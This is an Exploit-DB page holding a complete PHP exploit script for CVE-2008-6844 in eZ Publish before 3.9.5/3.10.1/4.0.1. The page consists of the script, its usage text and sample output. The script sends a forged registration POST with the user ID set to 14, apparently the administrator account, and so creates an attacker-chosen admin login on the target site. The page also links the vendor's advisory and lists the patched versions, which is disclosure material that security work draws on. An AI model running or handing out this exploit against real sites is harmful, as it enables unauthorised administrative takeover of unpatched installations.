eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit



EDB-ID: 7406 CVE: 2008-6844OSVDB-ID: 52708
Author: s4avrd0wPublished: 2008-12-10Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
<?php
/*
	eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
	Versions affected >= 3.5.6
	Resolved in 3.9.5, 3.10.1, 4.0.1
	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
	* tested on version 3.9.0
	usage:
	# ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server
	The options are required:
	-u Login of the new admin on eZ Publish
	-p Password of the new admin on eZ Publish
	-e Email where to go the letter for activation new admin account
	-s Target for privilege escalation
	example:
	# ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
	[+] Exploit successfully sending
	[+] Activate your new account and be registered in system using toor/P@ssw0rd
*/
function help_argc($script_name)
{
print "
usage:
# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server
The options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -e Email where to go the letter for activation new admin account
 -s Target for privilege escalation
example:
# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using toor/P@ssw0rd
";
}
function successfully($login,$password)
{
print "
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using $login/$password
";
}
if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
	help_argc($argv[0]);
	exit(0);
}
else
{
	$ARG = array();
	foreach ($argv as $arg) {
		if (strpos($arg, '-') === 0) {
			$key = substr($arg,1,1);
			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
		}
	}
	if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])
	{
		$post_fields = array(
			'ContentObjectAttribute_data_user_login_30' => $ARG[u],
			'ContentObjectAttribute_data_user_password_30' => $ARG[p],
			'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
			'ContentObjectAttribute_data_user_email_30' => $ARG[e],
			'UserID' => '14',
			'PublishButton' => '1'
		);
		$headers = array(
		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
		    'Referer' => $ARG[s]
		);
		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
		$res_http->addPostFields($post_fields);
		$res_http->addHeaders($headers);
		try {
    			$response = $res_http->send()->getBody();
			if (eregi("success", $response))
			{
				successfully($ARG[u],$ARG[p]);
			}
			else
			{
				print "[-] Exploit failed";
			}
		} catch (HttpException $exception) {
			print "[-] Not connected";
			exit(0);
		}
	}
	else
	{
		help_argc($argv[0]);
		exit(0);
	}
}
?>
# milw0rm.com [2008-12-10]






Comments

No comments so far